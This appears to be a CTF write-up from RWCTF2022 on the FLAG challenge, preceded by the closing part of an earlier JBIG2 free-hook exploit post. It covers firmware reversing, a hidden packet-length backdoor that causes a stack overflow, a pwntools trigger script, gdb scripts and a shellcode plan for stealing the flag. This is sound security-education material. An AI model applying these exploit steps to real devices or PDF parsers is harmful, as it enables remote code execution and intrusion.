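# load the value behind variable 0 into the data pointer slot; this changes the data pointer to free_hook_address
load_variable(page_bitmap_buf_to_data_ptr, 0)
# load the value behind variable 1 (libc_system_address) into +0, which is now the pointer stored at free_hook
# this completes the overwrite of the free hook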
load_variable(0, 1)

The free hook now holds the address of libc_system, so the next step is to execute a command.

We append one more bitmap that carries the command to run:

page0.append(
    GenericRegion(233, x=64, y=0, comb_op=CombOp.And, bitmap=Bitmap(COMMAND_TO_RUN))
)

When readGenericRegionSeg finishes, the newly created bitmap (the one carrying the command) is freed, which triggers system(command):

void JBIG2Stream::readGenericRegionSeg(Guint segNum, GBool imm,
                                       GBool lossless, Guint length)
{
    [...];
    // read the bitmap
    bitmap = readGenericBitmap(mmr, w, h, templ, tpgdOn, gFalse,
                               NULL, atx, aty, mmr ? length - 18 : 0);

    // combine the region bitmap into the page bitmap
    if (imm)
    {
        if (pageH == 0xffffffff && y + h > curPageH)
        {
            pageBitmap->expand(y + h, pageDefPixel);
        }
        pageBitmap->combine(bitmap, x, y, extCombOp);
        // system is triggered here
        delete bitmap;

        // store the region bitmap
    }
    [...]
}

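But there are two points to note:

imm must be true, otherwise the delete is never reached.
For the GenericRegionSeg being created, the one-dimensional bit offset derived from its two-dimensional (x, y) offset must not be smaller than 64 (i.e. 8 bytes).
This is because the code runs pageBitmap->combine before delete bitmap. At that moment pageBitmap->data is the free hook address; if combine modified the lowest 8 bytes at pageBitmap->data, the libc_system address stored in free_hook would be corrupted and free would no longer call libc_system.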
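To check the second constraint before building the file, one can compute where a region lands in the page bitmap. The sketch below assumes the bitmap is stored row by row, one bit per pixel, with each row padded to a whole number of bytes. That layout and the function names are my assumptions for illustration:

```python
def region_bit_offset(x: int, y: int, page_width: int) -> int:
    """Bit offset of pixel (x, y) from the start of the bitmap data."""
    line_bytes = (page_width + 7) // 8   # bytes per row, rounded up
    return y * line_bytes * 8 + x

def clobbers_hook(x: int, y: int, page_width: int) -> bool:
    # The first 64 bits hold the system() pointer written into free_hook.
    return region_bit_offset(x, y, page_width) < 64

print(clobbers_hook(64, 0, 1024))  # region used in the exploit: x=64, y=0
print(clobbers_hook(0, 0, 1024))
```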

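VI. References

RWCTF2022 Pwn Notes 2 - FLAG Writeup

2022-01-30T16:00:00.000Z

Introduction

These are notes written while reviewing the FLAG challenge from RWCTF2022.

The challenge is fairly complex, so it gets its own post.

Co-author: sakura

I. About FLAG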

FreeRTOS+LwIP+ARM+GoAhead
I don't want another backdoor ctf. So I have to say: "There is a backdoor in challange"
The default account in attachment is admin:admin
nc 8.210.44.156 31337
attachment

Pwn, difficulty:normal
Hint: flag.bin has a backdoor/bugdoor and you're supposed to take over it. The flag is not embedded in the binary and will be made available to the appliance via network at runtime, see docker-compose.yml in attachment for details.

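The challenge is a single binary built from several components:

FreeRTOS: a lightweight real-time operating system.
- No kernel: all tasks run in real mode and can execute privileged instructions.
- Application logic and kernel code are compiled into one binary, so there is no NX, PIE, ASLR, etc.
- No protected mode, so after running shellcode we must make sure the OS does not crash.
LwIP: a lightweight TCP/IP implementation for resource-constrained embedded systems.
ARM: 32-bit little-endian ARM architecture.
GoAhead: a tiny embedded web server.

The challenge ships several attachments; the useful ones are:

flag.py: the docker service sends a GET request to http://localhost:5555/action/backdoor every 30s. If:
- the response body is {'status' : 'success'}
- the HTTP status code is 200
then flag.py loads the flag and sends it to that backdoor as {"flag": flag}.
Clearly we need to pwn the binary, fake a backdoor service, receive the flag sent to it, and expose it to ourselves.
flag.bin: the challenge binary, discussed later.

dockerfile: records the qemu launch parameters: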

qemu-system-arm \
  -m 64 \
  -nographic \
  -machine vexpress-a9 \
  -net user,hostfwd=tcp::5555-:80 \
  -net nic \
  -kernel /mnt/flag.bin

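After starting the challenge, visiting localhost:5555 shows the login page of its web service:

Log in with account admin and password admin to reach an ordinary mini-game page. It looks unremarkable and is probably not the point. Visiting the backdoor endpoint directly returns a 404 page.

To quit QEMU, press ctrl + a in the terminal that launched it, release both keys, then press x.

II. Setting up the FLAG environment

Download and install the IDA BinDiff plugin - download link (a proxy may be needed)
Online tutorials say the installer asks for the IDA installation path. In my test it never asked, yet IDA still detected and loaded the BinDiff plugin.
BinDiff will be used to recover the GoAhead symbols.
Install a multi-architecture gdb:
sudo apt-get install gdb-multiarch
To debug the kernel:
- append -gdb tcp::1234 to the qemu launch parameters
- then run target remote localhost:1234 in gdb-multiarch to attach to qemu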

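III. Determining the kernel load base address

If we drop the challenge kernel straight into IDA, IDA cannot recognize it, so we have to determine and specify the load base address ourselves.

Determining a base address is hard in general and takes logical deduction plus some bold guessing.

First load flag.bin into 32-bit IDA (note: 32-bit) and set Processor Type to ARM Little-endian:

Then run make code on the first few instructions (hotkey p or c), which produces a series of memory-load instructions:

Notice the instructions that access addresses of the form 0x6001XXXX, and that gdb stops at instruction address 0x60010658:

So we can boldly infer that the base address is 0x60010000.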
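The guess above can be phrased as a tiny heuristic: mask the absolute addresses you observe down to an alignment boundary and take the most common result. This is only a sketch that narrows down candidates, not a reliable base-address finder. Apart from 0x60010658, the sample values and the 0x10000 alignment are assumptions of mine:

```python
from collections import Counter

def guess_base(pointers, align=0x10000):
    """Return the most common align-sized region among the observed pointers."""
    pages = Counter(p & ~(align - 1) for p in pointers)
    return pages.most_common(1)[0][0]

# 0x60010658 is the PC observed in gdb; the other values are made-up
# examples of the 0x6001XXXX literals seen in the disassembly.
observed = [0x60010658, 0x60010040, 0x600100A4, 0x6001F000]
print(hex(guess_base(observed)))
```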

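Once the load base address is known, rebase the program in IDA.

IDA can then analyze part of the code:

Next, select all code and data in IDA, right-click and choose Analyze to run a full analysis, and wait for it to finish.

This pass is still incomplete, so a second pass with the firmware-fix script is needed to automatically create functions, strings, and so on. (The end of the code region was determined to be 0x6006F544.)

Note: the script cannot tell segments apart, so it works only moderately well on this challenge and turns some obvious data into functions.
The source is short and worth a look if you are interested.

After these steps a fair number of strings still have no cross-references. We leave it at that for now.

Note that IDA's decompiler, Hex-Rays, relies on segment information (for example RWX permissions) to generate C code, so it is best to restore it. The simplest way is to mark the current ROM segment as RWX; I instead created a text segment based on the recovered results.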

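IV. Recovering symbols

a. GoAhead symbols

Now we can try to recover the GoAhead symbols. First locate GoAhead-related functions via string search plus cross-references:

Note: if F5 fails on the function's disassembly, find the end address of the previous function, right-click and choose Create Function, then decompile again.

A string on the last line of that function gives the GoAhead version, 5.1.5, so we can build a GoAhead 5.1.5 binary right away:

Building libgo.so with an arm32 compiler here gives better BinDiff results.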

git clone https://github.com/embedthis/goahead
cd goahead
git checkout v5.1.5
make
file build/linux-x64-default/bin/libgo.so # the target file

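Load libgo.so into IDA to produce the libgo.idb database. Then, in the IDA instance that has flag.bin open, use the BinDiff plugin to diff against libgo.idb.

A quick comparison shows that functions with Similarity above 0.80 mostly match the decompilation of libgo.so, so we can import the symbols for those functions:

Note that BinDiff compares by correlating basic blocks, decompiled code, and so on, so it still produces results even when the two files target different architectures.

The screenshot below shows me importing everything with similarity > 0.40. It is best not to be as reckless as I was and import functions with very low similarity.

Next, recover the GoAhead struct definitions: in the IDA window for libgo.so, click File -> Produce file -> Create C Header File to export the struct definitions to a new header; then in the flag.bin IDA window click File -> Load file -> Parse C header file to import it.

b. lwIP symbols

The challenge prints the version at startup:

lwIP-2.1.3 initialized!

First fetch the code and build it: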

git clone https://git.savannah.nongnu.org/git/lwip.git
cd lwip
git checkout STABLE-2_1_3_RELEASE
cmake -B build .
cd build
# install the ARM compiler
sudo apt-get install gcc-arm-linux-gnueabihf
CC=arm-linux-gnueabihf-gcc make lwipcore lwipallapps

make fails with various missing headers, so first fetch the FreeRTOS sources:

# in the directory that contains lwip
git clone https://github.com/FreeRTOS/FreeRTOS
git -C FreeRTOS submodule update --init --recursive

Then apply this patch to lwIP:

diff --git a/CMakeLists.txt b/CMakeLists.txt
index f05c0f61..a26752f1 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -14,6 +14,9 @@ set(CPACK_PACKAGE_VERSION_PATCH "${LWIP_VERSION_REVISION}")
 set(CPACK_SOURCE_IGNORE_FILES "/build/;${CPACK_SOURCE_IGNORE_FILES};.git")
 set(CPACK_SOURCE_PACKAGE_FILE_NAME "lwip-${LWIP_VERSION_MAJOR}.${LWIP_VERSION_MINOR}.${LWIP_VERSION_REVISION}")
 include(CPack)
+include_directories ("src/include")
+include_directories ("test/unit")
+include_directories ("../FreeRTOS/FreeRTOS/Demo/CORTEX_A9_Zynq_ZC702/RTOSDemo/src/lwIP_Demo/lwIP_port/include")
 
 # Target for package generation
 add_custom_target(dist COMMAND ${CMAKE_MAKE_PROGRAM} package_source)
diff --git a/src/include/lwip/arch.h b/src/include/lwip/arch.h
index 58dae33a..6159082f 100644
--- a/src/include/lwip/arch.h
+++ b/src/include/lwip/arch.h
@@ -126,8 +126,8 @@ typedef uint8_t   u8_t;
 typedef int8_t    s8_t;
 typedef uint16_t  u16_t;
 typedef int16_t   s16_t;
-typedef uint32_t  u32_t;
-typedef int32_t   s32_t;
+// typedef uint32_t  u32_t;
+// typedef int32_t   s32_t;
 #if LWIP_HAVE_INT64
 typedef uint64_t  u64_t;
 typedef int64_t   s64_t;
diff --git a/src/include/lwip/sockets.h b/src/include/lwip/sockets.h
index d70d36c4..ac17f302 100644
--- a/src/include/lwip/sockets.h
+++ b/src/include/lwip/sockets.h
@@ -108,7 +108,7 @@ struct sockaddr_storage {
 /* If your port already typedef's socklen_t, define SOCKLEN_T_DEFINED
    to prevent this code from redefining it. */
 #if !defined(socklen_t) && !defined(SOCKLEN_T_DEFINED)
-typedef u32_t socklen_t;
+// typedef u32_t socklen_t;
 #endif
 
 #if !defined IOV_MAX
@@ -519,10 +519,10 @@ struct pollfd
 #endif
 
 #if LWIP_TIMEVAL_PRIVATE
-struct timeval {
-  long    tv_sec;         /* seconds */
-  long    tv_usec;        /* and microseconds */
-};
+// struct timeval {
+//   long    tv_sec;         /* seconds */
+//   long    tv_usec;        /* and microseconds */
+// };
 #endif /* LWIP_TIMEVAL_PRIVATE */
 
 #define lwip_socket_init() /* Compatibility define, no init needed. */

Then rerun the build steps above.

This, however, produces static libraries, which cannot be dropped into IDA for analysis, so the CMake file list needs one more change:

diff --git a/src/Filelists.cmake b/src/Filelists.cmake
index 21d7b490..179f5716 100644
--- a/src/Filelists.cmake
+++ b/src/Filelists.cmake
@@ -268,12 +268,12 @@ else (DOXYGEN_FOUND)
 endif (DOXYGEN_FOUND)
 
 # lwIP libraries
-add_library(lwipcore EXCLUDE_FROM_ALL ${lwipnoapps_SRCS})
+add_library(lwipcore SHARED ${lwipnoapps_SRCS})
 target_compile_options(lwipcore PRIVATE ${LWIP_COMPILER_FLAGS})
 target_compile_definitions(lwipcore PRIVATE ${LWIP_DEFINITIONS}  ${LWIP_MBEDTLS_DEFINITIONS})
 target_include_directories(lwipcore PRIVATE ${LWIP_INCLUDE_DIRS} ${LWIP_MBEDTLS_INCLUDE_DIRS})
 
-add_library(lwipallapps EXCLUDE_FROM_ALL ${lwipallapps_SRCS})
+add_library(lwipallapps SHARED ${lwipallapps_SRCS})
 target_compile_options(lwipallapps PRIVATE ${LWIP_COMPILER_FLAGS})
 target_compile_definitions(lwipallapps PRIVATE ${LWIP_DEFINITIONS}  ${LWIP_MBEDTLS_DEFINITIONS})
 target_include_directories(lwipallapps PRIVATE ${LWIP_INCLUDE_DIRS} ${LWIP_MBEDTLS_INCLUDE_DIRS})

The build then fails with:

/usr/bin/ld: errno: TLS definition in /lib/x86_64-linux-gnu/libc.so.6 section .tbss mismatches non-TLS reference in CMakeFiles/lwipcore.dir/src/api/if_api.c.o

Replacing the extern errno declaration in one header fixes it:

diff --git a/src/include/lwip/errno.h b/src/include/lwip/errno.h
index 48d6b539..acd7817f 100644
--- a/src/include/lwip/errno.h
+++ b/src/include/lwip/errno.h
@@ -174,7 +174,8 @@ extern "C" {
 #define  EMEDIUMTYPE    124  /* Wrong medium type */
 
 #ifndef errno
-extern int errno;
+// extern int errno;
+#include <errno.h>
 #endif
 
 #else /* LWIP_PROVIDE_ERRNO */

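The .so shared library now builds. Recover the symbols following the same steps as above.

I later found that recovering the lwIP symbols served no purpose here, so treat this as a record of pitfalls.

V. Finding the vulnerability

Next, look at what useful information the string table holds:

They all look interesting, but none has cross-references (the recovery is still not good enough).

The references can still be found by searching globally for each string's address.

Following cross-references upward leads to this function, which registers a submit action whose handler is the function found previously. Further cross-referencing shows that login and logout actions are registered as well, but they look of little use and are ignored for now.

How is submit invoked? A string search yields the route path /web/submit.jst, so the page can be reached at the URL http://localhost:5555/submit.jst:

From the earlier reversing and from packet captures we know GoAhead uses sessions. If we submit some data on this page, it is still shown the next time we visit.

That is all for the submit endpoint for now. According to people who solved the challenge, GoAhead is essentially untouched apart from the added submit feature. From further material I looked up, the backdoor should be in the smc911x driver of the lwIP module of RT-thread (a Chinese RTOS)...

Hmm, how did the others find this backdoor...

Jumping straight to the answer: the backdoor is at address 0x6001B024 (the smc911x_emac_rx function, which receives packets). Below is the IDA decompilation after some simple manual symbol recovery: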

int __fastcall smc911x_emac_rx_backdoor(int a1)
{
  int *v1; // r4
  char v4[64]; // [sp+Ch] [bp-70h] BYREF
  int v5[2]; // [sp+4Ch] [bp-30h] BYREF
  int *v6; // [sp+54h] [bp-28h]
  int pktlen; // [sp+58h] [bp-24h]
  int status; // [sp+5Ch] [bp-20h]
  int v9; // [sp+60h] [bp-1Ch]
  int *data; // [sp+64h] [bp-18h]
  unsigned int v11; // [sp+68h] [bp-14h]
  int v12; // [sp+6Ch] [bp-10h]

  v12 = 0;
  v9 = a1;
  if ( !a1 )
    rt_assert_handler(byte_600704AC, 0);
  if ( (unsigned __int8)((unsigned int)smc911x_reg_read(v9, 124) >> 16) )
  {
    status = smc911x_reg_read(v9, 64);
    pktlen = HIWORD(status) & 0x3FFF;
    smc911x_reg_write(v9, 0x6C, 0);
    v11 = (unsigned int)(pktlen + 3) >> 2;
    v12 = pbuf_alloc(0, 4 * v11, 0x280u);
    if ( v12 )
    {
      data = *(int **)(v12 + 4);
      while ( v11-- )
      {
        v1 = data++;
        *v1 = smc911x_reg_read(v9, 0);
      }
    }
    if ( (status & 0x8000) != 0 )
      rt_kprintf("EMAC: dropped bad packet. Status: 0x%08x\n", status);
    v5[0] = dword_60079E78 + 0x16D6DD4;         // backdoor
    v5[1] = dword_60079E7C + 0xC25FBB;
    v6 = v5;
    if ( pktlen == (unsigned __int8)(dword_60079E78 - 0x2C) )// 0x62
    {
      backdoor_time = time(0);
      backdoor_cnt = 1;
    }
    else if ( pktlen == *((unsigned __int8 *)v6 + backdoor_cnt) && time(0) - backdoor_time <= 4 )
    {
      ++backdoor_cnt;
    }
    if ( backdoor_cnt == 8 && pktlen == 0x202 && v12 )
      diy_memcpy((int)v4, *(_DWORD *)(v12 + 4), pktlen);
  }
  return v12;
}

And this is the upstream source of the function (the versions differ, so there are some discrepancies):

/* reception packet. */
struct pbuf *smc911x_emac_rx(rt_device_t dev)
{
    struct pbuf *p = RT_NULL;
    struct eth_device_smc911x *emac;

    emac = SMC911X_EMAC_DEVICE(dev);
    RT_ASSERT(emac != RT_NULL);

    /* take the emac buffer to the pbuf */
    if (LAN9118_RX_FIFO_INF_RXSUSED(smc911x_reg_read(emac, LAN9118_RX_FIFO_INF)))
    {
        uint32_t status;
        uint32_t pktlen, tmplen;

        status = smc911x_reg_read(emac, LAN9118_RXSFIFOP);

        /* get frame length */
        pktlen = (status & LAN9118_RX_STS_PKT_LEN) >> 16;

        smc911x_reg_write(emac, LAN9118_RX_CFG, 0);

        tmplen = (pktlen + 3) / 4;

        /* allocate pbuf */
        p = pbuf_alloc(PBUF_RAW, tmplen * 4, PBUF_RAM);
        if (p)
        {
            uint32_t *data = (uint32_t *)p->payload;
            while (tmplen--)
            {
                *data++ = smc911x_reg_read(emac, LAN9118_RXDFIFOP);
            }
        }

        if (status & LAN9118_RXS_ES)
        {
            rt_kprintf(DRIVERNAME ": dropped bad packet. Status: 0x%08x\n", status);
        }
    }

    return p;
}

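Comparing the two, the backdoor trigger conditions are:

Send 8 packets whose lengths equal, one by one, the unsigned char values of a specific array (i.e. the string "backdoor").
Each of these packets must arrive while time(0) - backdoor_time <= 4, i.e. within about 4 seconds of the first one.
With the backdoor counter at 8, the next packet sent must have length 0x202.

This triggers a buffer overflow that copies 0x202 bytes into a 64-byte (0x40) array.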
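The conditions above amount to a small state machine. Below is a Python model of it, written from the decompiled listing as a sketch rather than a faithful re-implementation: the index guard on KEY is my simplification (the real code reads past v5 once the counter reaches 8), and the check that the pbuf is non-NULL is left out.

```python
KEY = b"backdoor"      # bytes of v5[0], v5[1] as recovered above
TRIGGER_LEN = 0x202
WINDOW = 4             # seconds, from time(0) - backdoor_time <= 4

class Backdoor:
    def __init__(self):
        self.cnt = 0
        self.t0 = 0

    def feed(self, pktlen: int, now: int) -> bool:
        """Process one received frame length; True means the memcpy overflows."""
        if pktlen == KEY[0]:
            self.t0, self.cnt = now, 1
        elif self.cnt < len(KEY) and pktlen == KEY[self.cnt] and now - self.t0 <= WINDOW:
            self.cnt += 1
        return self.cnt == len(KEY) and pktlen == TRIGGER_LEN

bd = Backdoor()
# 0x3E stands for an unrelated frame arriving in between.
lengths = [0x62, 0x3E, 0x61, 0x63, 0x6B, 0x64, 0x6F, 0x6F, 0x72, 0x202]
fired = [bd.feed(n, now=0) for n in lengths]
print(fired[-1])
```

Note that an unrelated frame matches neither branch and leaves the counter untouched, which is why stray packets do not break the sequence.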

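Since the challenge has no NX, PIE, ASLR, or similar protections, we can hijack control flow through the overflow and run our shellcode. After the shellcode finishes we must restore the function's stack data and jump back to the original caller.

A real-time operating system of this kind has no separate kernel, so if the runtime environment is corrupted and control flow cannot continue, the whole system restarts or halts immediately.

The shellcode needs careful design. Two approaches are listed here:

Manually register a handler and a route for action/backdoor that copies the incoming flag into some other file's data (for example /path/to/file1). When the health checker sends the flag to action/backdoor, we can then read it by visiting /path/to/file1.
Patch the error page so that it always returns {"status" : "success"} with HTTP status 200. Then patch the error-page code so that it references the flag held in the challenge's memory; the next visit to the error page reads the flag from memory and returns it to the browser.

VI. Exploitation

a. Triggering the backdoor

We pick the first approach (as a challenge) and manually register the handler and route for action/backdoor.

Dynamic debugging shows:

The packet metadata is 0x3a bytes long, so that length must be subtracted when sending data.
Packets must be sent with a pause between them. Otherwise they may arrive out of order and fail the backdoor check.
The program may also receive packets that do not come from the attacker (length around 0x3e, origin unknown), so these need to be filtered out while debugging.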
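One plausible reading of the 0x3a figure (my assumption, not something the debugging session confirms) is that the length reported by the controller covers the Ethernet header, minimal IPv4 and TCP headers, and the 4-byte frame check sequence. Under that assumption, the TCP payload size needed for a given frame length works out as follows:

```python
ETH_HDR, IPV4_HDR, TCP_HDR, FCS = 14, 20, 20, 4   # assumed: no IP/TCP options
OVERHEAD = ETH_HDR + IPV4_HDR + TCP_HDR + FCS

def payload_len(frame_len: int) -> int:
    """TCP payload bytes needed so that the driver sees frame_len."""
    if frame_len < OVERHEAD:
        raise ValueError("frame shorter than the fixed overhead")
    return frame_len - OVERHEAD

print(hex(OVERHEAD))
print([payload_len(ord(c)) for c in "backdoor"], payload_len(0x202))
```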

Based on the analysis above, the following code triggers the vulnerability:

#! python3
import time
from pwn import *
context(
    os='linux',
    arch='arm',
    bits=32,
    encoding='latin',
    log_level="debug"
)

def send_packet(packet_len, data=b''):
    p = remote("127.0.0.1", 5555)
    remain_len = packet_len - len(data)
    assert remain_len >= 0
    p.send(data + b"_" * remain_len)
    p.close()
    time.sleep(0.2)

if __name__ == '__main__': 
    for ch in "backdoor": # \x62 \x61 \x63 \x6b \x64 \x6f \x6f \x72
        send_packet(ord(ch) - 0x3a)
    send_packet(0x202 - 0x3a)

Recall that the trigger sequence must complete within the 4-second window, so I wrote this gdb script to help with debugging:

target remote localhost:1234
b *0x6001b1b4
commands
    if $r3 > 0x60
        printf "packet len = 0x%x\n", $r3
    end
    continue
end

b* 0x6001B1BC
commands
    printf "backdoor_cnt = 0\n"
    continue
end

b* 0x6001B250
commands
    printf "backdoor_cnt = %d\n", $r2
    continue
end

b* 0x6001B298
commands
    printf "backdoor_memcpy called\n"
    tb *0x6001b2a8
    # continue
end

b* 0x600101E4
commands
    printf "submit handler called\n"
    printf "Webs* wp = 0x%x\n", $r0
    continue
end

b* 0x60010208
commands
    printf "submit handler websGetVar called\n"
    continue
end

# b* 0x60d9c5e8     shellcode ret
# b* 0x60d9c5ec     handler address

c

The result is shown below; the stack overflow clearly succeeds:

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x62

Breakpoint 2, 0x6001b1bc in ?? ()
backdoor_cnt = 1

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x61

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 2

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x63

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 3

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x6b

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 4

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x64

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 5

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x6f

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 6

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x6f

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 7

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x72

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 8

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x202

Breakpoint 4, 0x6001b298 in ?? ()
backdoor_memcpy called

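and the machine crashes:

After the crash, press ctrl + a, release, then press x to close QEMU.

Debug again up to the call site of the overflowing function. Note that the call passes its arguments in R0, R1, and R2.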

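b. Stack overflow and shellcode upload

Next we dump the data currently on the stack and write it back in full during the overflow to keep the stack intact. The overwrite is 0x202 bytes long and is certain to reach the frames below, so they must be restored or a crash is likely.

Note that the overflow leaves very little room for shellcode of our own, only about 0x20 bytes, so the shellcode has to be uploaded some other way and the overflow used only to change the return address and jump to it.

The shellcode can be uploaded through the submit method added to GoAhead; dynamic debugging reveals the memory address where the submit message is stored.

However, the address to jump to is not this v4, because by the time of the overflow that memory has already been overwritten:

So how do we get the shellcode address? We can prepend a marker string to the shellcode, for example "ShellcodeHeader", and use gdb's find command to search memory for it:

find 0x60000000, +0x4000000, 'S','h','e','l','l','c','o','d','e' # find xxx, +xxx, "Shellcode" is avoided because it would also match the trailing \0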
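The same marker search can be done offline on a memory dump (for example one saved with gdb's dump binary memory command). A minimal sketch, where the dump contents and the helper name are made up for illustration:

```python
def find_marker(dump: bytes, base: int, marker: bytes):
    """Return absolute addresses of every occurrence of marker in a memory dump."""
    hits, pos = [], dump.find(marker)
    while pos != -1:
        hits.append(base + pos)
        pos = dump.find(marker, pos + 1)
    return hits

# Tiny fake dump for illustration only.
fake = b"\x00" * 0x10 + b"ShellcodeHeader" + b"\xde\xad" + b"\x00" * 4
addr = find_marker(fake, 0x60000000, b"Shellcode")[0]
# The shellcode itself starts right after the header string.
print(hex(addr + len(b"ShellcodeHeader")))
```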

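The search result is shown below. Note that the shellcode here was URL-encoded (a separate problem, covered later):

Alternatively, reverse websSetSessionVar and find the address of the copied string.

One more point: before submitting the shellcode, the session must be logged in, otherwise the shellcode will not be found in memory.

c. What the shellcode does

The shellcode has two main jobs:

Call websDefineAction("backdoor", backdoor_handler) to register the handler, where:

websDefineAction address: 0x6004D28C

The "backdoor" string does not need to persist, because websDefineAction copies it into the hash table.

backdoor_handler does need to persist, so it must be copied somewhere stable (for example into the file system; here I copy the handler shellcode to /login_err.html + 0x200, i.e. 0x606D3aD0).

The backdoor handler has to do the following:

Copy the flag that the checker may pass in into the 404 page.
Return a 200 {"status":"success"} page.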

static void backdoor_handler(Webs *wp)
{
    const char* key = "flag";
    const char* page = "{\"status\" : \"success\"}";
    // key is also passed as the default value so that NULL is never returned when the variable is missing, which simplifies the shellcode
    char* name = websGetVar(wp, key, key); // websGetVar: 0x600577C4
    // print the flag
    rt_printf(name); 
    // send page
    websSetStatus(wp, 200);      // websSetStatus:       0x600588C4
    websWriteHeaders(wp, -1, 0); // websWriteHeaders:    0x6005891C
    websWriteEndHeaders(wp);     // websWriteEndHeaders: 0x60058D30
    websWrite(wp, page);         // websWrite:           0x60058E2C
    websDone(wp);                // websDone:            0x6005496C
}

The way the 200 OK response is produced mainly follows goahead/blob/master/test/test.c#L327:

/*
    Implement /action/actionTest. Parse the form variables: name, address and echo back.
 */
static void actionTest(Webs *wp)
{
  cchar   *name, *address;

  name = websGetVar(wp, "name", NULL);
  address = websGetVar(wp, "address", NULL);
    websSetStatus(wp, 200);
    websWriteHeaders(wp, -1, 0);
    websWriteEndHeaders(wp);
  websWrite(wp, "name: %s, address: %s\n", name, address);
    websFlush(wp, 0);
  websDone(wp);
}

Call websAddRoute("/action/backdoor", "action", 0) to register the route.

websAddRoute() addr: 0x600636A0

Note that the third argument is 0: the route table is an array traversed in order, so setting pos to 0 puts the target route first.
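Why position 0 matters can be seen in a toy model of an ordered route table where the first matching prefix wins. This is a simplified illustration, not GoAhead's actual matching code, and the pre-existing table entries are invented:

```python
def add_route(routes: list, prefix: str, handler: str, pos: int = -1) -> None:
    """Insert a route; pos < 0 appends, otherwise insert at that index."""
    entry = (prefix, handler)
    if pos < 0:
        routes.append(entry)
    else:
        routes.insert(pos, entry)

def match(routes: list, uri: str):
    # The first route whose prefix matches wins, so order matters.
    for prefix, handler in routes:
        if uri.startswith(prefix):
            return handler
    return None

routes = [("/action", "some_earlier_handler"), ("/", "file")]  # made-up table
add_route(routes, "/action/backdoor", "action", 0)
print(match(routes, "/action/backdoor"))
```

With pos left at -1 the new entry would land behind the broader "/action" prefix and never be reached in this model.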

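A pitfall I hit: I first planned to re-register routes by overwriting route.txt and then calling websLoad("route.txt"). After reading the source this turned out to be far too cumbersome: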

/*
    Load route and authentication configuration files
 */
PUBLIC int websLoad(cchar *path)
{
    ...
        
    for (line = stok(buf, "\r\n", &token); line; line = stok(NULL, "\r\n", &token)) {
        kind = stok(line, " \t", &next);
        ...
        if (smatch(kind, "route")) {
            auth = dir = handler = protocol = uri = 0;
            abilities = extensions = methods = redirects = -1;
            while ((option = stok(NULL, " \t\r\n", &next)) != 0) {
                key = stok(option, "=", &value);
                if ...
                } else if (smatch(key, "handler")) {
                    handler = value;
                } else if (smatch(key, "methods")) {
                    addOption(&methods, value, 0);
                } else if (smatch(key, "redirect")) {
                    if (strchr(value, '@')) {
                        status = stok(value, "@", &redirectUri);
                        if (smatch(status, "*")) {
                            status = "0";
                        }
                    } else {
                        status = "0";
                        redirectUri = value;
                    }
                    ...
                } ...
                } else if (smatch(key, "uri")) {
                    uri = value;
                } else {
                    error("Bad route keyword %s", key);
                    continue;
                }
            }
            if ((route = websAddRoute(uri, handler, -1)) == 0) {
                rc = -1;
                break;
            }
            websSetRouteMatch(route, dir, protocol, methods, extensions, abilities, redirects);
#if ME_GOAHEAD_AUTH
            if (auth && websSetRouteAuth(route, auth) < 0) {
                rc = -1;
                break;
            }
        } ...
    }
    ...
    return rc;
}

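Reading through the source shows that calling websAddRoute("/action/backdoor", "action", 0) is enough to register the backdoor route, and the third argument lets us place it at the very front of the route table.

By default the other route fields are -1, so dir, protocol, methods, and so on take no part in route matching. We therefore do not need to call websSetRouteMatch ourselves.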

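d. Other pitfalls

More problems came up while writing the exploit:

The submitted shellcode gets URL-encoded by GoAhead:
So the submit request needs an HTTP header that explicitly tells GoAhead no encoding is needed:
"Content-Type":"application/x-www-form-urlencoded"
Note that with this header set, the data sent can no longer be JSON-like (i.e. not {'word': shellcode}), because the remote side would then ignore the header and URL-encode it anyway.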
